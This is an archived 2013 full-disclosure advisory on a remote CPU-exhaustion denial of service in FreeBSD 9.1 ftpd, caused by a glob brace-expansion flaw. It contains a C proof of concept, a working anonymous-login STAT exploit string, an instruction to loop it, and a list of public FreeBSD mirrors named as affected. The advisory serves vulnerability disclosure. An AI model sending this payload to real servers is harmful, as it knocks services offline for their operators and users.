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Message-ID: <CADE=m7Fz7g=Q1krqUcf=sU+59Z6EB7=oiG_jH1he=X_+jqLM6A@mail.gmail.com>
Date: Fri, 1 Feb 2013 12:33:57 +0100
From: Maksymilian Arciemowicz <max@...b.net>
To: full-disclosure@...ts.grok.org.uk
Subject: FreeBSD 9.1 ftpd Remote Denial of Service

FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/

Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003

Affected servers:
- ftp.uk.freebsd.org,
- ftp.ua.freebsd.org,
- ftp5.freebsd.org,
- ftp5.us.freebsd.org,
- ftp10.freebsd.org,
- ftp3.uk.freebsd.org,
- ftp7.ua.freebsd.org,
- ftp2.se.freebsd.org,
- ftp2.za.FreeBSD.org,
- ftp2.ru.freebsd.org,
- ftp2.pl.freebsd.org
and more...


--- 1. Description ---
I have decided check BSD ftpd servers once again for wildcards. Old
bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last
FreeBSD version.
Attacker, what may connect anonymously to FTP server, may cause CPU
resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous',
sending 'STAT' command with special wildchar, enought to create ftpd
process with 100% CPU usage.

Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include <stdio.h>
#include <glob.h>

int main(){
		glob_t globbuf;
		char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
		glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
}
--- PoC ---

--- Exploit ---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---

Result of attack:
ftp     13034   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.96
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13035   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.89
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13036   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.73
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13046   0.0  0.4  10416   1952  ??  R    10:48PM    0:00.41
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13047   0.0  0.4  10416   1960  ??  R    10:48PM    0:00.42
ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root    13219   0.0  0.3  10032   1424  ??  R    10:52PM    0:00.00
/usr/libexec/ftpd -dDA
root    13225   0.0  0.3  10032   1428  ??  R    10:52PM    0:00.00
/usr/libexec/ftpd -dDA
root    13409   0.0  0.3  10032   1404  ??  R    10:53PM    0:00.00
/usr/libexec/ftpd -dDA
root    13410   0.0  0.3  10032   1404  ??  R    10:53PM    0:00.00
/usr/libexec/ftpd -dDA
...

=>Sending:
STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}

=>Result:
@ps:
ftp      1336 100.0  0.5  10416   2360  ??  R    11:15PM 600:39.95
ftpd: 127.0.0.1: anonymous/anonymous@...ecurity.com: \r\n (ftpd)$
@top:
1336 root        1 103    0 10416K  2360K RUN    600:53 100.00% ftpd

one request over 600m (~10h) execution time and 100% CPU usage. This
issue allow to create N ftpd processes with 100% CPU usage.

Just create loop while(1) and send these commands
---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---

NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2

The funniest is that freebsd use GLOB_LIMIT in ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
	if (strpbrk(whichf, "~{[*?") != NULL) {
		int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

		memset(&gl, 0, sizeof(gl));
		gl.gl_matchc = MAXGLOBARGS;
		flags |= GLOB_LIMIT;
		freeglob = 1;
		if (glob(whichf, flags, 0, &gl)) {
---

but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU
resource exhaustion. ;]

Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723

only FreeBSD and GNU glibc are affected


--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233


--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve
problem with security ;)


--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http://cxsecurity.com/cveshow/CVE-2010-2632

Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion
http://cxsecurity.com/issue/WLB-2011050004
http://cxsecurity.com/cveshow/CVE-2011-0418

More CWE-399 resource exhaustion examples:
http://cxsecurity.com/cwe/CWE-399

The regcomp implementation in the GNU C Library allows attackers to
cause a denial of service proftpd
http://cxsecurity.com/cveshow/CVE-2010-4051
http://cxsecurity.com/cveshow/CVE-2010-4052
http://www.kb.cert.org/vuls/id/912279


--- 5. Contact ---
Maksymilian Arciemowicz
max 4T cxsecurity.com
http://cxsecurity.com/
http://cxsec.org/

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